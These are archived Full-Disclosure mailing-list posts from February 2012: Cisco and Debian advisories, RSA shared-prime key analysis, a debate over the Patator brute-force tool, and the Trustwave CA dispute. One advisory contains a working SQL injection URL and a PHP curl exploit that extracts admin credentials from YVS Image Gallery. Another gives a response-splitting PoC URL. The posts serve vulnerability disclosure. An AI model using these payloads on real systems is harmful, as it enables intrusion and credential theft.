check the arbor atlas for worldwide threats and sources.. http://atlas.arbor.net/ -HB -- James Smith schrieb am Do., 23. Feb 2012 17:20 EST: >Hello, > >Can anyone on this list provide botnet network traffic for analysis, or Ip’s >which have been infected. >-- >Sincerely; > > >James Smith >CEO, CEH, Security Analyst >Email: ja...@smithwaysecurity.com >Phone: 1877-760-1953 >Website: www.SmithwaySecurity.com > > >CONFIDENTIALITY NOTICE: This communication with its contents may contain >confidential and/or legally privileged information. It is solely for the use >of the intended recipient(s). Unauthorized interception, review, use or >disclosure is prohibited and may violate applicable laws including the >Electronic Communications Privacy Act. If you are not the intended recipient, >please contact the sender and destroy all copies of the communication. > >- This communication is confidential to the parties it was intended to serve - ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Botnet Traffic
That is a rather broad request considering how many flavors of botnets, various software, and purposes of of them. I would have to ask what possible purpose could want them for considering such broadness? However I would watch this https://twitter.com/#!/pastebin/status/172625863970529280 & http://pastebin.com/eJqhCjca On Thu, Feb 23, 2012 at 3:20 PM, James Smith wrote: > Hello, > > Can anyone on this list provide botnet network traffic for analysis, or Ip’s > which have been infected. > -- > Sincerely; > > > James Smith > CEO, CEH, Security Analyst > Email: ja...@smithwaysecurity.com > Phone: 1877-760-1953 > Website: www.SmithwaySecurity.com > > > CONFIDENTIALITY NOTICE: This communication with its contents may contain > confidential and/or legally privileged information. It is solely for the use > of the intended recipient(s). Unauthorized interception, review, use or > disclosure is prohibited and may violate applicable laws including the > Electronic Communications Privacy Act. If you are not the intended > recipient, please contact the sender and destroy all copies of the > communication. > > - This communication is confidential to the parties it was intended to serve > - > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Botnet Traffic
Hello, Can anyone on this list provide botnet network traffic for analysis, or Ip’s which have been infected. -- Sincerely; James Smith CEO, CEH, Security Analyst Email: ja...@smithwaysecurity.com Phone: 1877-760-1953 Website: www.SmithwaySecurity.com CONFIDENTIALITY NOTICE: This communication with its contents may contain confidential and/or legally privileged information. It is solely for the use of the intended recipient(s). Unauthorized interception, review, use or disclosure is prohibited and may violate applicable laws including the Electronic Communications Privacy Act. If you are not the intended recipient, please contact the sender and destroy all copies of the communication. - This communication is confidential to the parties it was intended to serve -___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] RSA and random number generation
On Thu, Feb 23, 2012 at 10:50 AM, Georgi Guninski wrote: >... > if i understood the paper correctly they broke some rsa keys because > they shared a prime $p$ (the rsa keys are different, shared rsa > keys might be explained by the debian random fiasco or the like bugs). > > i would suspect it is quite unlikely entropy/seed to explain the above > scenario - the odds appear small to me. see https://freedom-to-tinker.com/blog/nadiah/new-research-theres-no-need-panic-over-factorable-keys-just-mind-your-ps-and-qs """ How could this happen? It wasn't obvious at first how these types of entropy problems might result in keys that could be factored. We'll explain now for the geekier readers. Here's one way a programmer might generate an RSA modulus: prng.seed(seed) p = prng.generate_random_prime() q = prng.generate_random_prime() N = p*q If the pseudorandom number generator is seeded with a predictable value, then that would likely result in different devices generating the same modulus N, but we would not expect a good pseudorandom number generator to produce different moduli that share a single factor. However, some implementations add additional randomness between generating the primes p and q, with the intention of increasing security: prng.seed(seed) p = prng.generate_random_prime() prng.add_randomness(bits) q = prng.generate_random_prime() N = p*q If the initial seed to the pseudorandom number generator is generated with low entropy, this could result in multiple devices generating different moduli which share the prime factor p and have different second factors q. Then both moduli can be easily factored by computing their GCD: p = gcd(N1, N2). OpenSSL's RSA key generation functions this way: each time random bits are produced from the entropy pool to generate the primes p and q, the current time in seconds is added to the entropy pool. Many, but not all, of the vulnerable keys were generated by OpenSSL and OpenSSH, which calls OpenSSL's RSA key generation code. """ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] RSA and random number generation
On Wed, Feb 22, 2012 at 09:38:33AM -0800, coderman wrote: > On Tue, Feb 21, 2012 at 2:09 PM, Ramo wrote: > > I'll just leave this here. > > > > http://eprint.iacr.org/2012/064.pdf > > anyone who cares about proper key generation uses a hardware entropy > source. they put them in CPUs, they provide them on motherboards. they > make them very high throughput so your /dev/urandom will never block > no matter what the task. > > hwrandom -> egd -> /dev/[u]random always filled at boot and ever > after... SOLVED. > > anything less is asking for failure. > if i understood the paper correctly they broke some rsa keys because they shared a prime $p$ (the rsa keys are different, shared rsa keys might be explained by the debian random fiasco or the like bugs). i would suspect it is quite unlikely entropy/seed to explain the above scenario - the odds appear small to me. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Cisco Security Advisory: Cisco Small Business SRP 500 Series Multiple Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Cisco Small Business SRP 500 Series Multiple Vulnerabilities Advisory ID: cisco-sa-20120223-srp500 Revision 1.0 For Public Release 2012 February 23 16:00 UTC (GMT) Summary === Cisco Small Business (SRP 500) Series Services Ready Platforms contain the following three vulnerabilities: * Cisco SRP 500 Series Web Interface Command Injection Vulnerability * Cisco SRP 500 Series Unauthenticated Configuration Upload Vulnerability * Cisco SRP 500 Series Directory Traversal Vulnerability These vulnerabilities can be exploited using sessions to the Services Ready Platform Configuration Utility web interface. These vulnerabilities could be exploited from the local LAN side of the SRP device by default configuration and the WAN side of the SRP device if remote management is enabled. Remote management is disabled by default. Cisco has released free software updates that address these vulnerabilities. Workarounds that mitigate these vulnerabilities are available. This advisory is available at the following link: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120223-srp500 Affected Products = Vulnerable Products +-- The following Cisco SRP 520 Series models are affected if running firmware prior to version 1.1.26: * Cisco SRP 521W * Cisco SRP 526W * Cisco SRP 527W The following Cisco SRP 520W-U Series models are affected if running firmware prior to version 1.2.4: * Cisco SRP 521W-U * Cisco SRP 526W-U * Cisco SRP 527W-U The following Cisco SRP 540 Series models are affected if running firmware prior to version 1.2.4: * Cisco SRP 541W * Cisco SRP 546W * Cisco SRP 547W To view the firmware version on a device, log in to the Services Ready Platform Configuration Utility and navigate to the Status > Router page to view information about the Cisco SRP Series device and its firmware status. The Firmware Version field indicates the current running version of firmware on the Cisco SRP 500 Series device. Products Confirmed Not Vulnerable + No other Cisco products are currently known to be affected by these vulnerabilities. Details === Cisco SRP 500 Series devices are a flexible, cost-effective, fixed-configuration customer premises equipment (CPE) with embedded intelligence to enable service providers to create, provision, and deploy premium revenue-generating services to small businesses on an as-needed basis. Cisco SRP 500 Series devices running affected versions of firmware contain the following three vulnerabilities. These vulnerabilities could be exploited from the local LAN side of the SRP device by default configuration and the WAN side of the SRP device if remote management is enabled. Remote management is disabled by default. Cisco SRP 500 Series Web Interface Command Injection Vulnerability +- Cisco SRP 500 Series devices contain a command injection vulnerability that could allow an authenticated session to inject commands to be executed by the operating system. An attacker could exploit this vulnerability by either enticing an administrator to access a crafted link or by performing a man-in-the-middle attack to intercept an authenticated session. An exploit could allow the attacker to execute operating system commands on the device that are run in the context of the root user. This vulnerability has been documented in Cisco bug ID CSCtt46871 and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2012-0363. Cisco SRP 500 Series Unauthenticated Configuration Upload Vulnerability +-- Cisco SRP 500 Series devices contain an unauthorized access vulnerability that could allow an unauthenticated, remote attacker to upload an unauthorized configuration file. An attacker could exploit this vulnerability by first creating a desired configuration file and then uploading it using the unauthenticated URL. An exploit could allow the attacker to alter the configuration of the Cisco SRP 500 Series device. This vulnerability has been documented in Cisco bug ID CSCtw55495 and has been assigned CVE ID CVE-2012-0364. Cisco SRP 500 Series Directory Traversal Vulnerability +- Cisco SRP 500 Series devices contain a directory traversal vulnerability in the Local TFTP file upload application that could allow an authenticated, remote attacker to upload files to directories in the operating system of the Cisco SRP 500 Series device. An attacker could exploit this vulnerability by enticing an authenticated user to click on a crafted link or by installing malicious files on the FTP or HTTP server that the administrators of the device may use. An exploit could allow the attacker to install malicious software on the Cisco
Re: [Full-disclosure] Patator - new multi-purpose brute-forcing tool
That could be. I've done testing with Python with multi-threads and multi-processing and have gotten a couple hundred more over HTTP than I have on managing threads (not to mention how much easier it was). However, this also needed to handle much more data and parse the responses for validation before continuing, as you said not over network login (I assume lan here). So perhaps that was my issue with the multi-threaded. http://code.google.com/p/http-brute The speed also was an issue. At that speed the amount of threads were not able to complete at points in time, causing them to be repeated. But when I spanned cores it no longer became an issue. But as you said, this could've been just how I was managing the threads. On Thu, Feb 23, 2012 at 8:18 AM, van Hauser wrote: > Hi folks, > > as the programmer of hydra, some comments on this ... > > On 23.02.2012 06:52, Grandma Eubanks wrote: > > Multiprocessing is quiet a bit faster than utilizing threads (this > > should be obvious as threads are GIL locked, while multi-processing can > > be spread amongst cores with the kernel's scheduler). > > yes, multiprocessing is faster than threads, and threads used > intelligently are faster than forking - but ... for network login > hacking that is not the bottleneck and its not where optimization helps > anything. > > the secret of being fast is how you balance the connections to the > network services and skipping parts of the protocols which are not > essential. > > thats why hydra is the fastest one out there (own biased testing ;-) > http://thc.org/thc-hydra/network_password_cracker_comparison.html ) > although it uses forking. go figure. > hydra got more stable and faster when I rewrote the balancing engine in > v7, the v7.2 is now the fastest and is very stable. > > (why forking? because when it was written the goal was to be able to run > on any platform, even on esoteric platforms like ultrix 4, MVS > openedition etc. - and it did. In today's monocultures that a less > useful feature, I agree) > > On Feb 22, 2012 6:43 AM, "lanjelot" wrote: > > To put it bluntly, I just got tired of using Medusa, Hydra, ncrack, > > metasploit auxiliary modules, nmap NSE scripts and the like because: > > - they either do not work or are not reliable (got me false > >negatives several times in the past) > > - they are slow (not multi-threaded or not testing multiple or > >not testing multiple passwords within the same TCP connection) > > have you read the code of the named tools? > hydra does multiple password attempts in the connection if the protocol > supports it - the competitors do so too I'd guess, medusa and ncrack use > threading or parallel socketing - and rgw false negatives/positives ... > you will have them too, because its always interpretation of results. > > post some speed comparison and show that your tool is ruling :-) > competition makes the tools better. > > Greets, > van Hauser > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Patator - new multi-purpose brute-forcing tool
Indeed. It could also be very fast and not use threads at all. But IMO it's much harder to write an efficient multithreaded program in python than in C, at the very least you need a good understanding of the inner workings of the python interpreter. I find it a bit suspicious in general that a python program can outperform a pure C program just like that. It's not impossible, but I think I'll reserve my judgement on this until some benchmarks are published. On Thu, Feb 23, 2012 at 1:36 PM, Andres Riancho wrote: > Grandma, > > On Thu, Feb 23, 2012 at 2:52 AM, Grandma Eubanks wrote: >> Multiprocessing is quiet a bit faster than utilizing threads (this should be >> obvious as threads are GIL locked, while multi-processing can be spread >> amongst cores with the kernel's scheduler). > > That's not always true. If the process is network bound (which seems > to be the case with a bruteforce tool), then having multiprocessing > will not necessarily increase speed. If the software was well written, > it can be very fast and use python threads. > >> On Wed, Feb 22, 2012 at 6:51 PM, Nate Theis wrote: >>> >>> You might look into PyPy for a speed boost: http://pypy.org >>> >>> On Feb 22, 2012 6:43 AM, "lanjelot" wrote: Hello FD, Released two months ago, and downloaded a few thousand times since, I wanted to share with you a new multi-purpose brute-forcing tool named Patator (http://code.google.com/p/patator/). I am posting here because I would like to get more feedback from people using it, so feel free to fire me an email if you have any queries, or rather use the issues tracker on patator project page. To put it bluntly, I just got tired of using Medusa, Hydra, ncrack, metasploit auxiliary modules, nmap NSE scripts and the like because: - they either do not work or are not reliable (got me false negatives several times in the past) - they are slow (not multi-threaded or not testing multiple passwords within the same TCP connection) - they lack very useful features that are easy to code in python (eg. interactive runtime) Basically you should give Patator a try once you get disappointed by Medusa, Hydra or other brute-forcing tools and are about to code your own small script because Patator will allow you to: - Not write the same code over and over, due to its a modular design and flexible usage - Run multi-threaded - Benefit from useful features such as the interactive runtime commands, automatic response logging, etc. Currently Patator supports the following modules : - ftp_login : Brute-force FTP - ssh_login : Brute-force SSH - telnet_login : Brute-force Telnet - smtp_login : Brute-force SMTP - smtp_vrfy : Enumerate valid users using the SMTP 'VRFY' command - smtp_rcpt : Enumerate valid users using the SMTP 'RCPT TO' command - http_fuzz : Brute-force HTTP/HTTPS - pop_passd : Brute-force poppassd (not POP3) - ldap_login : Brute-force LDAP - smb_login : Brute-force SMB - mssql_login : Brute-force MSSQL - oracle_login : Brute-force Oracle - mysql_login : Brute-force MySQL - pgsql_login : Brute-force PostgreSQL - vnc_login : Brute-force VNC - dns_forward : Forward lookup subdomains - dns_reverse : Reverse lookup subnets - snmp_login : Brute-force SNMPv1/2 and SNMPv3 - unzip_pass : Brute-force the password of encrypted ZIP files - keystore_pass : Brute-force the password of Java keystore files The name "Patator" comes from the famous weapon : http://www.youtube.com/watch?v=xoBkBvnTTjo Cheers! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ >>> >>> >>> ___ >>> Full-Disclosure - We believe in it. >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> Hosted and sponsored by Secunia - http://secunia.com/ >> >> >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ > > > > -- > Andrés Riancho > Director of Web Security at Rapid7 LLC > Founder at Bonsai Information Security > Project Leader at w3af > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes
Re: [Full-disclosure] Trustwave and Mozilla (Resolved)
http://convergence.io On 22 February 2012 19:12, Jeffrey Walton wrote: > It appears to be official. > > Trustwave issued MitM certificates, which is deceptive, unethical, and > contrary to its agreement for inclusion. > > Mozilla just rewarded their violations of trust by continuing their > inclusion. Apparently, agreements between Mozilla and CAs have no > veracity as both are more than happy to violate the end user. > > Original Bug: https://bugzilla.mozilla.org/show_bug.cgi?id=724929 > NSS and Firefox Update: > https://bugzilla.mozilla.org/show_bug.cgi?id=728617 > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Patator - new multi-purpose brute-forcing tool
Grandma, On Thu, Feb 23, 2012 at 2:52 AM, Grandma Eubanks wrote: > Multiprocessing is quiet a bit faster than utilizing threads (this should be > obvious as threads are GIL locked, while multi-processing can be spread > amongst cores with the kernel's scheduler). That's not always true. If the process is network bound (which seems to be the case with a bruteforce tool), then having multiprocessing will not necessarily increase speed. If the software was well written, it can be very fast and use python threads. > On Wed, Feb 22, 2012 at 6:51 PM, Nate Theis wrote: >> >> You might look into PyPy for a speed boost: http://pypy.org >> >> On Feb 22, 2012 6:43 AM, "lanjelot" wrote: >>> >>> Hello FD, >>> >>> Released two months ago, and downloaded a few thousand times since, I >>> wanted to share with you a new multi-purpose brute-forcing tool named >>> Patator (http://code.google.com/p/patator/). >>> >>> I am posting here because I would like to get more feedback from >>> people using it, so feel free to fire me an email if you have any >>> queries, or rather use the issues tracker on patator project page. >>> >>> To put it bluntly, I just got tired of using Medusa, Hydra, ncrack, >>> metasploit auxiliary modules, nmap NSE scripts and the like because: >>> - they either do not work or are not reliable (got me false >>> negatives several times in the past) >>> - they are slow (not multi-threaded or not testing multiple >>> passwords within the same TCP connection) >>> - they lack very useful features that are easy to code in python >>> (eg. interactive runtime) >>> >>> Basically you should give Patator a try once you get disappointed by >>> Medusa, Hydra or other brute-forcing tools and are about to code your >>> own small script because Patator will allow you to: >>> - Not write the same code over and over, due to its a modular design >>> and flexible usage >>> - Run multi-threaded >>> - Benefit from useful features such as the interactive runtime >>> commands, automatic response logging, etc. >>> >>> Currently Patator supports the following modules : >>> - ftp_login : Brute-force FTP >>> - ssh_login : Brute-force SSH >>> - telnet_login : Brute-force Telnet >>> - smtp_login : Brute-force SMTP >>> - smtp_vrfy : Enumerate valid users using the SMTP 'VRFY' command >>> - smtp_rcpt : Enumerate valid users using the SMTP 'RCPT TO' command >>> - http_fuzz : Brute-force HTTP/HTTPS >>> - pop_passd : Brute-force poppassd (not POP3) >>> - ldap_login : Brute-force LDAP >>> - smb_login : Brute-force SMB >>> - mssql_login : Brute-force MSSQL >>> - oracle_login : Brute-force Oracle >>> - mysql_login : Brute-force MySQL >>> - pgsql_login : Brute-force PostgreSQL >>> - vnc_login : Brute-force VNC >>> >>> - dns_forward : Forward lookup subdomains >>> - dns_reverse : Reverse lookup subnets >>> - snmp_login : Brute-force SNMPv1/2 and SNMPv3 >>> >>> - unzip_pass : Brute-force the password of encrypted ZIP files >>> - keystore_pass : Brute-force the password of Java keystore files >>> >>> The name "Patator" comes from the famous weapon : >>> http://www.youtube.com/watch?v=xoBkBvnTTjo >>> >>> Cheers! >>> >>> ___ >>> Full-Disclosure - We believe in it. >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> Hosted and sponsored by Secunia - http://secunia.com/ >> >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ > > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -- Andrés Riancho Director of Web Security at Rapid7 LLC Founder at Bonsai Information Security Project Leader at w3af ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] YVS Image Gallery Sql Injection
-=[ADVISORY---]=- YVS Image Gallery Author: Corrado Liotta Aka CorryL [corry...@gmail.com] -=[---]=- -=[+] Application: YVS Image Gallery -=[+] Version: 0.0.0.1 -=[+] Vendor's URL: http://yvs.vacau.com/gallery.html -=[+] Platform: Windows\Linux\Unix -=[+] Bug type: Sql INJECTIONS -=[+] Exploitation: Remote -=[-] -=[+] Author: Corrado Liotta Aka CorryL ~ corryl80[at]gmail[dot]com ~ -=[+] Facebook: https://www.facebook.com/CorryL -=[+] Twitter: https://twitter.com/#!/CorradoLiotta -=[+] Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611 -=[+] +Google: https://plus.google.com/u/0/109396477464303670923 ...::[ Descriprion ]::.. This is a small database driven gallery created to be implemented within your existing site. The coding is reasonably straight forward and can be easily moved into your existing development by anyone with basic understanding of PHP. Only a first attempt at the system has a long way to go, but it provides you with all the necessary tools to run your own picture gallery, such as uploading of multiple images and creation of thumbnails. The gallery is distributed as free-ware but if you decide to use it in any business or just decide that it's worth it, any donations will be greatly appreciated. details will be made available soon. ...::[ Bug ]::.. exploiting this bug a remote attaker is able' to go up again to user name and admin password ...::[ Proof Of Concept ]::.. http://Server-Victim/image_gallery/view_album.php?album_id=-1%20UNION%20%20SELECT%20username%20FROM%20user ...::[ Exploit ]::.. #!/usr/bin/php -f http://$target/image_gallery/view_album.php?album_id=-1%20UNION%20%20SELECT%20$info%20FROM%20user";); curl_setopt($ch, CURLOPT_HTTPGET, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); curl_setopt($ch, CURLOPT_TIMEOUT, 3); curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3); curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3); curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target"); $buf = curl_exec ($ch); curl_close($ch); unset($ch); echo $buf; ?> ..::[ Disclousure Timeline ]::.. [23/02/2012] - No Vendor Information -- Corrado Liotta A.k.a (CorryL) Email: corry...@gmail.com Slype: corrado_liotta Facebook: http://www.facebook.com/home.php/CorryL Twitter: https://twitter.com/#!/CorradoLiotta Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611 Specialist in: Bug Hunting Security Audits Penetration Test ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2417-1] libxml2 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2417-1 secur...@debian.org http://www.debian.org/security/Nico Golde February 22, 2012 http://www.debian.org/security/faq - - Package: libxml2 Vulnerability : computational denial of service Problem type : local/remote Debian-specific: no Debug bug : 660846 CVE ID : CVE-2012-0841 It was discovered that the internal hashing routine of libxml2, a library providing an extensive API to handle XML data, is vulnerable to predictable hash collisions. Given an attacker with knowledge of the hashing algorithm, it is possible to craft input that creates a large amount of collisions. As a result it is possible to perform denial of service attacks against applications using libxml2 functionality because of the computational overhead. For the stable distribution (squeeze), this problem has been fixed in version 2.7.8.dfsg-2+squeeze3. For the testing (wheezy) and unstable (sid) distributions, this problem will be fixed soon. We recommend that you upgrade your libxml2 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk9FdM8ACgkQHYflSXNkfP+BkwCcDh11fC0BO+8QLOjCnwYlJ9xt jQwAnjBxzz8GLFVXLMuTTlrV4lnVvD6h =0qEK -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Mobile Mp3 Search Engine HTTP Response Splitting
-=[ADVISORY---]=- Mobile Mp3 Search Engine 2.0 Author: Corrado Liotta Aka CorryL [corry...@gmail.com] -=[---]=- -=[+] Application: Mobile Mp3 Search Engine -=[+] Version: 2.0 -=[+] Vendor's URL: http://www.php-search-engine.com/_mobile -=[+] Platform: Windows\Linux\Unix -=[+] Bug type: HTTP Response Splitting -=[+] Exploitation: Remote -=[-] -=[+] Author: Corrado Liotta Aka CorryL ~ corryl80[at]gmail[dot]com ~ -=[+] Facebook: https://www.facebook.com/CorryL -=[+] Twitter: https://twitter.com/#!/CorradoLiotta -=[+] Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611 ...::[ Descriprion ]::.. This mobile mp3 search engine is the first mp3 search engine with mobile high end supported. It is an automatic mobile mp3 search engine that using 4shared API plus Google powered search engine. The script comes with autocharts system, latest search, and direct download link from 4shared. ...::[ Bug ]::.. HTTP Response Splitting HTTP response splitting is a form of web application vulnerability, resulting from the failure of the application or its environment to properly sanitize input values. It can be used to perform cross-site scripting attacks, cross-user defacement, web cache poisoning, and similar exploits. ...::[ Proof Of Concept ]::.. http://remote-server/dl.php?url=http://www.google.it ..::[ Disclousure Timeline ]::.. [22/02/2012] - Vendor notification -- Corrado Liotta A.k.a (CorryL) Email: corry...@gmail.com Slype: corrado_liotta Facebook: http://www.facebook.com/home.php/CorryL Twitter: https://twitter.com/#!/CorradoLiotta Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611 Specialist in: Bug Hunting Security Audits Penetration Test ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Trustwave and Mozilla (Resolved)
Hello, They weren't rewarded. They were not punished for voluntarily coming forward and reporting the problem to Mozilla. Punishing them for doing so would only convince others not to come forward in the future. This has triggered a policy change and announcements to CA, if you've followed Mozilla's security policy discussions and these *will* result in people being removed for such behavior in the future. Hyperbole serves no real purpose here. Al On 02/22/2012 04:12 PM, Jeffrey Walton wrote: > It appears to be official. > > Trustwave issued MitM certificates, which is deceptive, unethical, and > contrary to its agreement for inclusion. > > Mozilla just rewarded their violations of trust by continuing their > inclusion. Apparently, agreements between Mozilla and CAs have no > veracity as both are more than happy to violate the end user. > > Original Bug: https://bugzilla.mozilla.org/show_bug.cgi?id=724929 > NSS and Firefox Update: https://bugzilla.mozilla.org/show_bug.cgi?id=728617 > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -- Al Billings Mozilla Security ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
